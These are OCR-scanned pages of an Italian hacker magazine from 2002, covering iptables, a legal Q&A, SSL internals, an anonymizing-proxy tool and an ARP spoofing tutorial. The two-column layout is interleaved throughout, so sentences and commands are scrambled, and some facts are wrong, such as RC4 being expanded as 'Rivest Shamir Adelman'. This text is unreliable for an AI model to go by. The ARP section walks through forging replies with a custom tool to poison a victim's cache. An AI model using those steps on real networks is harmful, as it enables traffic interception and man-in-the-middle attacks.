NAT per mascherarli( ma se non è iptables -A input -s 0/0 -d 0/0 -j iptables -P input DROP
specificata, iptables usa quella custom
predefinita, cioè Flter. Per visualizzare le regole imposta-
Nell’esempio, l’opzione A aggiun- te finora, potete digitate quanto
Nella tabella filter ci sono 3 catene ge una regola collocandola all’ini- segue:
predefinite: zio della catena; l’opzione -l ag-
INPUT : contiene le regole per i giunge la regola alla fine della iptables -L
pacchetti in entrata; catena, e in seguito aggiunge una
FORWARD: contiene le regole che regola che respinge tutti i pac- Siccome iptables ha tre tabelle,
diranno se il pacchetto necessita chetti ICMP in entrata. potete scegliere di visualizzarne
del mascheramento; (DROP = Respingere ACCEPT = solo una con:
OUTPUT : contiene le regole per i Accettare)
pacchetti in uscita; In router o firewall ci possono pe- iptables -t nat -L
Nelle tabelle Nat e Mangle ci sono rò essere diverse schede di rete: Se poi volete visualizzare solo una

www.hackerjournal.it |21
>>
catena di una tabella, usate: l’opzione -o. Questa opzione pe-
iptables -t nat -L FORWARD
Mini firewall rò lascia la rete scoperta, perchè
se un cracker vuole entrare nell’-
Se volete inoltre salvare il risul- Se il vostro scopo è protegere un host della rete interna, gli baste-
tato su un file (cosa consigliata computer direttamente connesso a rà digitare l’IP del firewall per
per possbili problemi seguenti) internet tramite un modem di casa avere una connessione diretta (le
potete usare questo comando: (insomma se non è una rete azien- cose sono in realtà leggermente
dale) potete costruirvi un sempli- più complicate). Per evitare que-
/sbin/iptables-save > cissimo firewall personale creando sto, applichiamo le regole di ma-
iptables.txt un banalissimo script. scheramento solo alla rete inter-
Per esempio, per bloccare il ping na:
(Attenzione: le versioni prece- sul vostro computer e registrare i
denti alla 1.2.1a non supporta- tentativi di ping su un log basterà iptables -A FORWARD -s
no questa opzione) creare il seguente script: 192.168.1.0/24 -j ACCEPT
iptables -A FORWARD -d
Inoltre, nel caso il vostro script #!bin/sh 192.168.1.0/24 -j ACCEPT
personalizzato parte a ogni av- echo “1” >> iptables -A FORWARD -s
vio del computer per impostare /proc/sys/net/ipv4/icmp_echo_igno 10.100.100.0/24 -j ACCEPT
le regole del firewall potete ag- re_all iptables -A FORWARD -d
giungere la seguente stringa exit 0 10.100.100.0/24 -j ACCEPT
iptables -A FORWARD -j DROP
iptables -F (Per ulteriori informazioni riguar-
do agli script leggetevi il mio tuto- Come dicevamo all’inizio, con
che cancella tutte le regole im- rial all’indirizzo questi strumenti è anche possibile
postate in Filter, ma non quelle http://accessdenied85.cjb.net). registrare i pacchetti respinti, in
in NAT o Mangle, che bisogna modo da avere un log da esami-
cancellalre così: nare, alla ricerca di tracce di un
Il comando per richiamare i mo- attacco o per risolvere problemi
iptables -t nat -F duli è il seguente: sulla rete. Nei prossimi numeri
vedremo esattamente come fare.
/sbin/insmod *nomemodulo*
>> Mascheramneto in :: AccE$$DeniEd ::
iptables Per mascherare l’IP si usa il se- http://accessdenied85.cjb.net K
guente comando :

Tuttavia, per cancellare solo iptables -t nat -A POSTROUTING


una catena di filtere si usa sem- -d ! 192.168.1.0/22 -j MASCHE-
pre il comando iptables -F ma RADE
con il nome della catena (per iptables -t nat -A POSTROUTING
esempio INPUT). -d ! 10.100.100.0/24 -j MASCHE-
I servizi utilizzati da Internet, RADE
come FTP, richiedono un suppor-
to aggiuntivo. Iptables fornisce Questa regole viene aggiunta al-
vari moduli per il maschera- la catena postrouting (-A) della
mento, che consentono di acce- tabella nat (-t). Con il punto esla-
dere a queste risorse: mativo si dice a iptables di ma-
scherare tutti i pac-
MODULO DESCRIZIONE chetti non diretti a
192.168.1.0 porta
22 e 10.100.100.0
ip_masq_ftp Modulo per il mascheramento porta 24. Come im-
delle connessioni FTP postazione predefi-
ip_masq_raudio Per il Real Audio nita, iptables usa la
ip_masq_irc per IRC prima scheda di re-
ip_masq_vdolive Per le connessioni VDO Live te. Per modificare
questa scelta, si usa
ip_masq_cuseeme Per CU-See_Me

www.hackerjournal.it |22
Legge

LO SPORTELLO LEGALE DI HACKER JOURNAL


“Evitiamo di finire
nei guai!”

Si può fare o no?


A volte non è semplice tirare la linea che separe un
comportamento legittimo da un reato.
Ecco le risposte di TuonoBlu ai vostri dubbi legali

3) in ogni caso è tuttora in vigore la legge 5


>> Mp3 legittimi? febbraio 1992, n. 93, che prevede, all’art. 3,
co. 1, che “gli autori e i produttori di fono-
Ho un lettore portatile di Mp3 con hard disk grammi, i produttori originari di opere audio-
che mi ha cambiato la vita: posso finalmen- visive e i produttori di videogrammi, e loro
te portarmi a spasso gran parte della mia aventi causa, hanno diritto di esigere, quale
collezione musicale senza dover trasportare compenso per la riproduzione privata per uso
un armadio. Quasi tutti i file Mp3 che pos- personale e senza scopo di lucro di fono-
seggo li ho estratti personalmente dai miei grammi e di videogrammi, una quota sul Indipendentemente dalla malvagità del com-
CD, e quindi da quanto mi risulta il loro prezzo di vendita al rivenditore dei na- portamento (che non rileva ai fini della perpe-
possesso e utilizzo sono perfettamente lega- stri o supporti analoghi di registrazione trazione del reato) il lettore si sta rendendo re-
li. Possiedo però anche svariati dischi audio e video (musicassette, videocassette e sponsabile di accesso abusivo ad un sistema
su vinile. Il procedimento di acquisizione e altri supporti) e degli apparecchi di registra- informatico, condotta prevista e punita dal-
conversione in Mp3 sarebbe lungo, labo- zione audio”. l’art. 615 ter del Codice Penale.
rioso e porterebbe a risultati piuttosto sca- Il comportamento corretto da tenere in questi
denti. Se io quindi scaricassi gli Mp3 >> Abuso di legittima casi è quello di limitarsi a individuare l’elabo-
degli album di cui possiedo una copia ratore da cui parte l’assalto (senza neppure
in vinile e li conservassi per ascoltarli, difesa? tentare di accedervi, visto che anche tale con-
commetterei comunque un reato? dotta è punibile) e comunicare al titolare (o al-
Vi voglio porre un quesito, ho un portatile che le Forze dell’Ordine, se quest’ultimo non è rin-
Il comportamento non costituisce reato per utilizzo sia sul lavoro che a casa. Ora, dato tracciabile) tutte le informazioni del caso.
diversi motivi: che è associato un indirizzo ip pubblico, rice-
1) benché scaricato da Internet, il brano è vo regolarmente dai 10-15 attacchi al >> Conseguenze dei
comunque una copia dell’originale giorno, sia su porte udp, che su http (è in-
detenuto legittimamente, sebbene pro- stallato un ftp server per scopi lavorativi). sequestri
veniente da un altro originale; Spesso la maggioranza degli attacchi sono
2) l’uso personale di opere musicali da parte di server con il virus Nimda, che mi Ho visto molte volte siti pirata chiusi perchè
non è previsto dalla legge come rea- stressano in continuazione, per fortuna ho zo- contenenti materiale illegale. Ma la “giusti-
to, essendo richiesto il fine di lucro (derivan- ne allarm che li blocca, ma quando diventato zia” si limita a chiuderlo oppure si han-
te, per esempio, dalla vendita); insistenti tipo 10-15 al di, allora eseguo un no anche dei problemi in futuro (fedina
tracert per vedere un pò meglio chi è. Poi, tra- penale, processi, eccetera)?
mite languard, entro nel pc, cercando di
Chi è TuonoBlu? capire che ca**o vuole da me. Ormai mi Neo
È abbastanza chiaro che dietro al rendo conto quanto è infettato da nimda (tut-
nick TuonoBlu si cela un avvocato, to il disco risulta essere condiviso). Quindi, Ogni sequestro penale è preceduto o seguito
ma qual è il suo vero nome? Vedia- entro nel suo disco, e sotto la cartella esecu- (a seconda del tipo di provvedimento adotta-
mo come ve la cavate con le investi- zione automatica, gli metto un file txt con to dall’autorità giudiziaria) un procedimen-
gazioni in Rete: provate a scoprire dentro l’avviso che il server è infettato, to penale, che può concludersi, ovvia-
di chi si tratta, e scriveteci la rispo- dopodiche gli mando in shutdown (se mente, con l’assoluzione o la condan-
sta a redazione@hackerjournal.it. possibile) il sistema. na. Il discorso è diverso in caso di provvedi-
I primi tre a dare la risposta corret- Facendo ciò mi tutelo dai suoi continui attac- mento cautelare ex art. 700 c.p.c. Questo
ta riceveranno in omaggio una co- chi, e tutelo anche il server che mi attacca. provvedimento si applica in processi civili, che
pia di un suo libro relativo a hac- La domanda è: ma facendo cosi, commetto potrebbero anche non iniziare se le parti (l’at-
king e criminalità (il titolo non ve lo qualche reato o no? taccante e il danneggiato) trovano un accor-
diciamo, sennò è troppo facile...). ..::BiT::.. do, anche al di fuori del processo. K

23 | www.hackerjournal.it
sicurezza

COME FUNZIONANO LE CONNESSIONI CIFRATE PER WEB, TELNET E FTP

I segreti di SSL
Torniamo ad esaminare Secure Socket Layer uno dei protocolli di cifratura
più diffusi per il Web e le connessioni Telnet.

(Encrypt-Decrypt-Encrypt); il processo di
decodifica può essere reso compatibile con
il precedente, fermando il meccanismo a
metà.
Se le tre chiavi usate sono le stesse, il Tri-
ple DES è equivalente a un singola cifratura
DES; con questo metodo un’applicazione
che può usare solo il DES, è in grado di co-
municare con un'altra che sta usando il Tri-
ple DES. Se invece le tre chiavi sono diffe-
renti, la decrittazione mezzo disturberà il
messaggio opposto ed esso non decifrerà il
primo stadio.

A
bbiamo già parlato si SSL, grafati e per questo viene utilizzata la critto- RC4: un algoritmo della RSA Data Se-
con Onda Quadra nel nume- grafia simmetrica (DES e RC4) curity, Inc. Originariamente le specifiche
ro 2, e l'argomento ha susci- DES: è l'acronimo di Digital Encryption progettuali dellíRC4 erano segrete, ma nel
tato un grande interesse. Ve- Standard, un algoritmo di criptazione che 1994 sono state divulgate.
diamo quindi di spulciare tra usa chiavi a 64bit, non ha un elevata po- Questo algoritmo è molto utilizzato in
le pieghe di Secure Socket La- tenza di calcolo in confronto alle attuali. vari tipi di applicazioni. L'RC4 usa la chia-
yer per comprenderne il fun- Ciononostante, questo algoritmo è molto ve fornita dagli utilizzatori per produrre
zionamento nei minimi dettagli. Il protocol- usato, spesso nella sua variante Triple-DES, una sequenza numerica pseudo-casuale;
lo SSL (Secure Socket Layer) è un prodot- basata sull'uso di DES ripetuto per tre volte. essa è legata al vettore XOR con i dati di
to di Netscape, ma è supportato anche da Con questo standard il testo in chiaro in input.
altri browser. Questo protocollo garantisce input e il testo cifrato in uscita hanno una Questo significa che le operazioni di
la privacy delle comunicazioni su internet e lunghezza standard di 8 byte. L'input deve crittazione e di decrittazione sono identi-
permette di far comunicare un client con un quindi essere un multiplo di questo blocco che. Il numero di bit della chiave è varia-
server in modo sicuro e privato, e infatti elementare; se la lunghezza del messaggio bile: va da un minimo di 8 ad un massimo
questo protocollo è molto utilizzato per con- non corrisponde a un multiplo di questa di 2048. Il codice usato da questo sistema
nessioni dove c'è bisogno di inviare infor- grandezza, deve essere imbottito di dati, fi- ha una lunghezza dieci volte inferiore ri-
mazioni riservate, come per esempio il nu- no ad arrivare alla misura necessaria per spetto al DES (minore sicurezza), ma il
mero di carta di credito o nomi utene e pas- operare in modo CBC o ECB correttamen- vantaggio sta nella velocità di esecuzione
sword per l’accesso a siti e servizi protetti. te. (circa 5 volte più veloce). Non ci sono at-
La chiave di cifratura è formata da 56 tacchi conosciuti nei suoi confronti. La ver-
bit casuali e 8 bit pari, che vanno a com- sione internazionale dell’RC4 a 40 bit è
>> Privacy porre una chiave a 64 bit. stata violata con il metodo a forza bruta in
8 giorni da ben due associazioni.
Sono molti gli aspetti che rendono sicu- 3DES: Questo metodo è figlio del pre-
ro e affidabile questo protocollo, e vale la cedente e consiste nell'esecuzione del DES
pena di esaminarli in dettaglio. per tre volte consecutive, per triplicare il nu-
>> Autenticazione
Il sistema di cifratura parte da dopo lo mero di bit nella chiave di cifratura . Sono
handshake fino alla fine della connessione molti i sistemi che supportano questo meto- Questo processo viene attuato utiliz-
poiché anche i dati inviati vengono critto- do. Questa tecnica è conosciuta come EDE zando sistemi di cifratura asimmetrica o

24 | www.hackerjournal.it
>>
a chiave pubblica come RSA e DSS. In "SSL Alert Protocol" per comunicare i mes- Client <------ Certificate request <------
questo modo si è sicuri di comunicare di- saggi di errore SSL tra client e server. Server
rettamente con il server giusto (l'autenti- Vediamo come funziona una connessione Client <------ ServerHelloDone <------
cazione è richiesta sia dal server che dal (client -> server) con SSL Server
client).
Nella prima parte il client e il server Client ------> Certificate ------> Server
RC4: è l'acronimo di Rivest Shamir concordano sulla versione delprotocollo e Client ------> Certificate verify ------> Server
Adelman questo algoritmo è considerato sugli algoritmi di crittografia da usare, e Client ------> ChangeChiperspec ------>
molto sicuro se si usano chiavi lunghe co- poi usano la cifratura a chiave pubblica Server
me da 768 bit o 1024, questo algoritmo per scambiarsi i dati crittati. Client ------> Finished ------> Server
a chiave pubblica è il più usato sia per ci- Vediamo il tutto più in dettaglio: il
frare che per le firme digitali. Il suo fun- client spedisce al server un hello e que- Client <------ ChangeChiperspec <------
zionamento è simile a questo st'ultimo risponde allo stesso modo (con Server
un server hello), questo ha un valore im- Client <------ Finished <------ Server
1. A genera due numeri primi grandi p e q ; portante infatti durante questa fase ven-
2. A calcola n = p ◊ q e f(n) = (p - 1)(q - 1) ; gono stabiliti: Il client hello ha una struttura come
3. A sceglie un numero 1 < e < f(n) tale che protocol version, cipher suite, session ID e questa:
gcd(e, f(n)) = 1; compression method
4. A calcola d = e-1 mod f(n) usando líalgo- struct {
ritmo di Euclide Esteso; ProtocolVersion client_version;
5. A pubblica n ed e come sua chiave pub- Random random;
blica PA = (e, n). SessionID session_id;
6. A conserva n e d come sua chiave privata CipherSuite cipher_suites<2..215>;
SA = (d, n). Compression Method compression _me-
thods<1..27>;
DSS: è l'acronimo di Digital Signa- } ClientHello;
ture Standard non è molto affidabile e
utilizzato solo per la firma e non è stato mentre il server hello ha una struttura co-
ancorareso del tutto pubblico. me questa:

struct {
>> Multipiattaforma Se durante questa fase qualcosa falli- ProtocolVersion server_version;
sce o va storto, la connessione viene inter- Random random;
SSL è multipiattaforma, e lavora su rotta... a questo punto il server manda un SessionID session_id;
Win come su Solaris. messaggio di server hello done questo CipherSuite cipher_suite;
In passato il governo americano im- per indicare al client che la fase hello CompressionMethod compression_me-
poneva pesanti limitazioni all’utilizzo message dell'handshake è terminata con thod;
delle tecniche di crittografia “forti”, per successo e attende una risposta positiva } ServerHello;
cui non si potevano impiegare chiavi dal client.
più lunghe di 40 bit. A questo punto si scambieranno i dati server_version: contiene la versione
Oggi queste limitazioni sono cadu- di cui abbiamo parlato sopra. del protocollo
te, ed è finalmente possibile scaricare e La fase di handshake è finita, e duran-
utilizzare legittmamente browser che te la connessione il server può mandare Random: è una struttura completa-
supportano le chiavi lunghe. svariati hello request anche se questi ver- mente casuale generata dal server che
ranno ignorati dal client. non ha nessuna dipendenza dal messag-
Handshake e analisi dei processi Al contrario, il client può mandare gio hello dato dal client
Inanzitutto i protocolli usati durante la a sua volta dei client hello per rinego-
sequenza di handshakesono: ziare i dati di una connessione pre-esi- Compression_method: il metodo di
stente. Un completo esempio di hands- compressione dato dal server
"SSL Handshake Protocol" per stabilire hake è questo:
una sessione tra il client ed il server Una chiper suite è definita da tre com-
Client ------> ClientHello ------> Server ponenti:
"SSL Change Cipher Spec protocol" per Client <------ ServerHello <------ Server - Metodo di scambio della chiave
concordare la Cipher Suite per la ses- - Algoritmo di cifratura per il trasferimen-
sione. Client <------ Certificate <------ Server to dei dati

www.hackerjournal.it |25
sicurezza

COME FUNZIONANO LE CONNESSIONI CIFRATE PER WEB, TELNET E FTP

- Message Digest per la creazione del L'uso di RC4 con chiavi di 40 bit sem-
MAC (Message Autentication Code) brerebbe una cosa poco sicura e in effetti
è così.
1. Metodo di scambio della chiave: Qua in italia è d'obbligo per la legge
Il metodo di scambio della chiave serve degli USA sull'esportazione degli algorit-
per definire come verrà concordata in mi di crittazione.
seguito la chiave segreta. SSL 2.0 sup- Molti altri bachi sono stati scoperti su
porta solo lo scambio di chavi RSA, questo protocollo. Come al solito, bug-
mentre la versione successiva SSL 3.0 traq è un ottimo strumento per tenersi ag-
supporta vari algoritmi di scambio. giornati.
All’indirizzo www.openssl.org si trovano le specifi- Prima di lasciarvi volevo dire due ulti-
2. Algoritmo di cifratura per il tra- che e i sorgenti di OpenSSL, un’implementazione me cose molto importanti.
Open Source di SSL.
sferimento dei dati
1. Il protocollo SSL non è un protocollo in-
Per la cifratura dei dati, certificato dal client (anche se questo non dipendente ma si appoggia ad un altro
SSL usa algoritmi di crittogra- succede molto spesso). protocollo, il TCP/IP.
fia simmetrica. Si possono ef-
fettuare ben otto scelte: Client certificate: Il client dopo avere
ricevuto un server hello done manda il 2. SSL è applicato in molti servizi usati
Cifratura Blocchi suo certificato. ovunque e molto spesso come telnet e ftp:
.RC4 con chiave di 40-bit
.RC4 con chiave di 128-bit Secret Premaster message (RSA): Il SSL-telnet:
client genera un messaggio premaster di ftp://ftp.psy.uq.oz.au/pub/Crypto/SSLap
CBC Cifratura Blocchi 48 byte usando l'algoritmo a chiave pub- ps/
.RC2 con chiave di 40-bit blica del server che ha una struttura come
.DES40, DES, 3DES_EDE. questo: SSL-ftp:
.Idea ftp://ftp.psy.uq.oz.au/pub/Crypto/SSLapps/
.Fortezza struct { K
ProtocolVersion client_version; www.eviltime.com
Eventualmente, è anche possibile non opaque random[46];
eseguire alcuna cifratura. } PreMasterSecret;

3. Message Digest per la creazione del Client_version e random sono cose già vi-
MAC ste prima

Questo determina come verrà creata Pre_Master_Secret : è il valore gene-


l'impronta digitale dal record. rato a random dal client usato per gene-
Le scelte sono tre: rare il master secret vero e proprio

MD5, con hash a 128-bit struct {


SHA (Secure Hash Algorithm) con hash a public-key-encrypted PreMasterSecret
160-bit pre_master_secret;
} EncryptedPreMasterSecret;
o anche qui, si può evitare di scegliere
alcuna impronta.
>> SSL=sicurezza?
Server certificate: per una maggiore
sicurezza, durante l'handshake il server In teoria, la risposta dovrebbe essere
invia il cosiddetto "server certificate" ovve- SI, ma la pratica è cosa ben diversa infat-
ro il certificato che viene inviato subito do- ti SSL riporta varie falle e può essere "fa-
po il server hello. cilmente" (si fa per dire) violabile con me-
Se il server non dispone di un certifica- todi come:
to, allora manda un messaggio di server Crittanalisi
key exchange. Il server potrebbe anche Forza bruta
chiedere un "certificate request", ovvero un Replay

26 | www.hackerjournal.it
pratica

COME USARE IL PROGRAMMA MULTIPROXY


>>

Navigare anonimi con


il minimo sforzo
Siete stufi di dover spippolare ogni volta
le impostazioni dei proxy per potersi
garantire un po' di sano anonimato in rete? Ecco il programma che fa per voi!

S 2
i sa che ogni volta Come seconda cosa, bisognerà
che si visita un sito, procurarsi una lista di proxy ag-
questo potrà ottene- giornata. Quella presente sul sito
re su di noi tutta una è stata modificata l'ultima volta in
serie di informazioni, a partire dall'indi- maggio; per qualcosa di più recente, potete
rizzo IP (dal quale si può risalire a gran- provare su www.atomintersoft.com/
di linee alla posizione geografica), fino products/alive-proxy/proxy-list/,
all'indirizzo di provenienza, il sistema avendo cura di scegliere soli proxy anonimi.
operativo e il browser utilizzati.

3
Uno dei metodi più usati per nasconde- Aprite il Blocco Note e Create un
re le proprie tracce è l'utilizzo di un ser- file di testo che contenga gli indi-
ver proxy, un computer intermedio tra rizzi dei proxy, uno per riga. Do-
noi e il destinatario della connessione. po aver aperto MultiProxy con un

5
Invece di vedere le nostre "impronte di- doppio clic sulla sua icona, fate clic su Op- Aprite ora il browser e, nelle im-
gitali" (nel senso più moderno della pa- tions, poi sulla linguetta Proxy servers list. Fa- postazioni del proxy http, inserite
rola), il sito visitato vedrà l'indirizzo e le te clic con il tasto destro del mouse e sele- l'indirizzo 127.0.0.1 porta 8088.
informazioni relative al Proxy. zionate il comando Import Proxy List dal me- Con Internet Explorer 6, selezio-
I proxy possono essere utilizzati nu Files, selezionando il file che avete appe- nate Opzioni Internet dal menu Strumenti,
da un'interfaccia Web (come quella na creato. fate clic sulla linguetta Connessioni. Se vi
di anonymizer.com) o modificando le collegate a Internet con una Lan, potete in-
impostazioni di rete (o quelle del serire le impostazioni del proxy direttamente
browser). Il problema nell'ultimo caso è nella finestra Connessioni, altrimenti sele-
che molto spesso i proxy server nascono zionate la connessione di Accesso Remoto
e muoiono nello spazio di pochi giorni, desiderata, premete il pulsante Impostazio-
oppure in certi momenti sono così affol- ni, spuntate la casella Utilizza un server
lati da essere quasi inutilizzabili, e quin- proxy e inserite l'indirizzo come sopra.
di bisogna modificare spesso cercarne
uno che funzioni e modificare le impo-
stazioni.
Insomma, dopo un po' la cosa potrebbe
diventare scocciante. Se non avete esi-
genze da 007, potrebbe essere molto
utile l'utility MultiProxy, che mantiene
una lista di proxy che vengono control-
lati per verificarne l'affidabilità e la ve-
locità ogni volta che si avvia il pro-
gramma. Provvederà lui a ordinarli per
velocità, eliminare quelli non attivi (o

4
non sicuri) e a selezionare di volta in Chiudete per ora la finestra Op-
volta il migliore. tions, e dalla finestra premete il
pulsante Check all proxies: ve- A questo punto, ogni volta che richiede-

1
Come al solito, la prima cosa drete partire un contatore sulla rete un indirizzo Internet dal vostro bro-
da fare è scaricare il program- sinistra, che mostra lo stato di avanzamento wer, questo non lo contatterà direttamen-
ma dall'indirizzo www.multi- della verifica delle condizioni dei vari server. te, ma farà una richiesta a MultiProxy,
proxy.org, e installarlo sul pro- Attendete che arrivi alla fine. Nella finestra che vi collegherà al più veloce proxy del-
prio computer con un doppio clic sul file Proxy Servers list dovrebbe ora comparire la la sua lista, permettendovi una naviga-
.exe che si ottiene dopo aver scompatta- lista dei proxy, con un pallino verde su quel- zione finalmente riservata. K
to ll'archivio .zip scaricato. li attivi e uno rosso su quelli inattivi.

27| www.hackerjournal.it
28_31ARP_spoofing 21-08-2002 17:30 Pagina 28

Networking

COME DIROTTARE PACCHETTI DENTRO A UNA RETE LOCALE

Spoofing dei pacchetti ARP


Cerchiamo di comprendere come è possibile portare attacchi direttamente al
meccanismo di smistamento dei pacchetti di una LAN

192.168.1.2 vuole mandare un icmp echo a


192.168.1.154:

# ping -c 1 192.168.1.154
PING 192.168.1.154 (192.168.1.154): 56 octets data
64 octets from 192.168.1.154: icmp_seq=0 ttl=255 ti-
me=3.0 ms

tcpdump:
15:19:26.217004 0:10:a4:c0:15:92 ff:ff:ff:ff:ff:ff 0806 42:
arp who-has 192.168.1.154 tell 192.168.1.2
15:19:26.217563 0:80:c8:7a:39:14 0:10:a4:c0:15:92
0806 64: arp reply 192.168.1.154 is-at 0:80:c8:7a:39:14
15:19:26.217608 0:10:a4:c0:15:92 0:80:c8:7a:39:14
0800 98: 192.168.1.2 > 192.168.1.154: icmp: echo re-
quest (DF)
15:19:26.218351 0:80:c8:7a:39:14 0:10:a4:c0:15:92
0800 102: 192.168.1.154 > 192.168.1.2: icmp: echo
reply

Il primo pacchetto è “dite a 192.168.1.2 il mac di

Q
ual è la più grande vulnerabilità di una LAN? Pro- 192.168.1.154”. Ovviamente è un pacchetto broadcast
babilmente è il fatto che sia possibile falsificare (ff:ff:ff:ff:ff:ff) perché sta “cercando” l’host.
pacchetti ARP. Grazie a questo, si può far credere L’host risponde con un pacchetto unicast dicendo “192.168.1.154
che delle macchine appartengano a una certa rete, si trova all’ indirizzo 0:80:c8:7a:39:14”
mentre questo non è vero, ridirezionando TUTTO il A questo punto può essere mandato il pacchetto ICMP. Proprio co-
traffico Ethernet. Come può essere sfruttata questa me succede con il DNS, se uno esegue telnet nasa.gov. Prima il
vulnerabilità? In molti casi un attaccante la userà pacchetto UDP alla 53 e poi il syn alla 23. Se ora viene manda-
per monitorare il traffico di rete. Oppure potrebbe utilizzarla to un altro ICMP a 192.168.1.154 noterete che NON ci sarà
per un attacco Denial of Service o per interporsi in una co- un’altra richiesta ARP. Gli ARP, come gli host dei NS, vengono me-
municazione, intercettandola (attacco “man in the middle”). morizzati in cache:

>> Cos’e l’ARP? root:~# arp -na


(192.168.1.154) at 00:80:C8:7A:39:14 [ether] on eth0
root:~#
L’ARP è l’Address Resolution Protocol e serve a mappare gli in-
dirizzi IP a indirizzi ethernet (MAC). Quando viene trasmesso Ogni tanto i dati in cache “scadono”, e quindi bisogna mandare un
un pacchetto IP in una rete, il sistema deve sapere a quale altra richiesta. La cache naturalmente serve a non sovraccaricare la
macchina fisicamente attaccata alla LAN deve mandare que- rete di pacchetti ARP.
sto pacchetto (se al router o un altro host nella rete). Quindi
“chiede” alla LAN chi ha l’IP x.x.x.x e qualcuno risponderà
x.x.x.x si trova alla scheda di rete che ha indirizzo MAC >> Come sono formati i pacchetti ARP
xx:xx:xx:xx:xx:xx. In questo modo si può completare l’header
datalink (802.3) e il pacchetto può essere inviato. Questo me-
todo è simile al DNS, che serve per associare il numero IP a Ecco come viene costruito un pacchetto ARP; il codice è preso da
un certo indirizzo del tipo nomehost.nomedominio.it. Se vo- /usr/include/linux/if_arp.h:
glio mandare un pacchetto a nasa.gov, io “chiedo” (in questo
caso al NS auth di nasa.gov) l’ip che corrisponde a nasa.gov. struct arphdr
Posso quindi completare il header IP e mandare il pacchetto. {
Ci sono 2 tipi di pacchetti arp: arp request e arp reply. Illu- unsigned short ar_hrd; /* format of hardware address */
striamo il concetto con tcpdump: unsigned short ar_pro; /* format of protocol address */
unsigned char ar_hln; /* length of hardware address */

28 | www.hackerjournal.it
28_31ARP_spoofing 21-08-2002 17:30 Pagina 29

>>
unsigned char ar_pln; /* length of protocol address */ reply viene semplicemente riempito il target hardware, modi-
unsigned short ar_op; /* ARP opcode (command) */ ficato l’opcode e rimandato indietro.
Il sistema operativo sa dove mandare i pacchetti grazie appunto
#if 0 alla tabella ARP (la cache). Quest’ultima viene aggiornata e cam-
/* biata dai pacchetti ARP. Iniziamo a mandare un po’ di pacchetti
*Ethernet looks like this : This bit is variable sized finti e vediamo cosa succede... in teoria quando viene inviata un
however... ARP request, se io mando un reply con il MIO mac address, il si-
*/ stema pensa di collegarsi ad X ma in realtà si collega a me. Di-
unsigned char ar_sha[ETH_ALEN]; /* sender hardware ciamo in parole semplici che se io mando un NS reply che affer-
address */ ma che l’indirizzo di nasa.gov è 192.168.1.2, l’host pensa che si
unsigned char ar_sip[4]; /* sender IP address collega a nasa.gov ma in realtà si collega a 192.168.1.2 ;).
*/ Vediamo un semplice esempio:
unsigned char ar_tha[ETH_ALEN]; /* target hardware
address */unsigned char ar_tip[4]; /* target IP address 192.168.1.154 (la vittima) vuole collegarsi a 192.168.1.2
*/ (che in realtà non esiste).
#endif
root@DigitalF:~# ping -c 1 192.168.1.2
}; PING 192.168.1.2 (192.168.1.2): 56 octets data

non torna nulla perché non riceve ARP reply


>> ARP Reply
29:36:41.323528 0:80:c8:7a:39:14 ff:ff:ff:ff:ff:ff 0806 64:
Format e length non ci interessano (arp NON è solo per as- arp who-has 192.168.1.2 tell 192.168.1.154 (senza
sociare indirizzi ethernet e IP: è un protocollo generico, an- reply)
che se qui parleremo solo di IP). Ar_op è ARP request o reply.
“Sender hardware address e IP” (indirizzo infatti:
MAC di chi invia la richiesta e IP corri-
spondente), e “target hardware e ip” root@DigitalF:~# arp -na
sono le parti più interessanti del pac- (192.168.1.2) at <incomplete> on eth0
chetto. Sender hardware e Sender IP (192.168.1.1) at 00:10:A4:C0:15:92 [ether] on eth0
restano sempre l’IP e il MAC di co- root@DigitalF:~#
lui che manda il pacchetto. Se
invece il pacchetto è request, proviamo invece a mandare un finto reply da 192.168.1.1
target hardware viene riem- (che ha mac 00:10:A4:C0:15:92):
pito con lo 0 (perché non
si conosce) e target ip # ./arp <dev> <srcmac> <dstmac> <arp op:1req
è l’ip di cui voglia- 2 rep> <srcmac> <srcip> <dstmac> <dstip> <de-
mo sapere l’- lay>
hardware ad-
dress. Nel quindi...

# ./arp eth0 aa:aa:aa:aa:aa:aa ff:ff:ff:ff:ff:ff 2


00:10:A4:C0:15:92 192.168.1.2 aa:bb:bb:bb:bb:bb
192.168.1.30 10000000
DELAY = 10000000
SENT
#

root@DigitalF:~# arp -na


? (192.168.1.2) at 00:10:A4:C0:15:92 [ether] on eth0
? (192.168.1.1) at 00:10:A4:C0:15:92 [ether] on eth0
root@DigitalF:~#

Ora 192.168.1.154 (DigitalF per capirci...) crede che


192.168.1.2 sia 00:10:A4:C0:15:92

ora proviamo a trasmettere...

root@DigitalF:~# ping -c 1 192.168.1.2


PING 192.168.1.2 (192.168.1.2): 56 octets data

www.hackerjournal.it | 29
28_31ARP_spoofing 21-08-2002 17:30 Pagina 30

Networking

COME DIROTTARE PACCHETTI DENTRO A UNA RETE LOCALE

—- 192.168.1.2 ping statistics —- 192.168.1.8 10000000


1 packets transmitted, 0 packets received, 100% packet DELAY = 10000000
loss SENT
root@DigitalF:~# #
root@DigitalF:~# arp -na
tcpdump: (192.168.1.1) at 00:10:A4:C0:15:92 [ether] on eth0
20:08:02.816143 0:80:c8:7a:39:14 0:10:a4:c0:15:92 root@DigitalF:~#
0800 102: 192.168.1.154 > 192.168.1.2: icmp: echo re-
quest Non succede nulla. Se però si prova con il vero dst ip di Di-
gitalF (.154)

>> ARP Request # ./arp eth0 aa:aa:aa:aa:aa:aa ff:ff:ff:ff:ff:ff 1


00:10:40:30:20:11 192.168.1.4 00:00:00:00:00:00
Come volevasi dimostrare: in poche parole, abbiamo spoofato 192.168.1.154 10000000
192.168.1.2 (che non esisteva all’inizio), non c’è reply perché il DELAY = 10000000
sistema operativo sa solo di essere .1 e non .2 Quindi il MAC è SENT
nostro e il dst IP è rimasto identico. Se guardate bene, si notano #
dei valori strani nella riga di comando...source mac root@DigitalF:~# arp -na
aa:aa:aa:aa:aa:aa non combacia con (192.168.1.4) at 00:10:40:30:20:11 [ether] on eth0
00:10:A4:C0:15:92; questo avviene perché il kernel non effettua (192.168.1.1) at 00:10:A4:C0:15:92 [ether] on eth0
una verifica. Questo è soltato uno degli esempi possibili ma un at- root@DigitalF:~#
tacker potrebbe fare molto altro falsificando i reply. Per fare un
breve riassunto, diciamo che con gli ARP reply è possibile modifi- Et voila! La voce è stata creata. Si noti che con arp reply non
care la cache ARP, e inviare pacchetti broadcast senza che il tar- funziona mettendo il vero dst ip. Con dst ip 127.0.0.1,
get ip venga controllato. 214.0.0.1 eccetera invece non funziona.
A cosa ci serve mandare un ARP request? Quindi il kernel controlla effettivamente il dst ip per creare una
entry nel table, e non si può broadcastare.
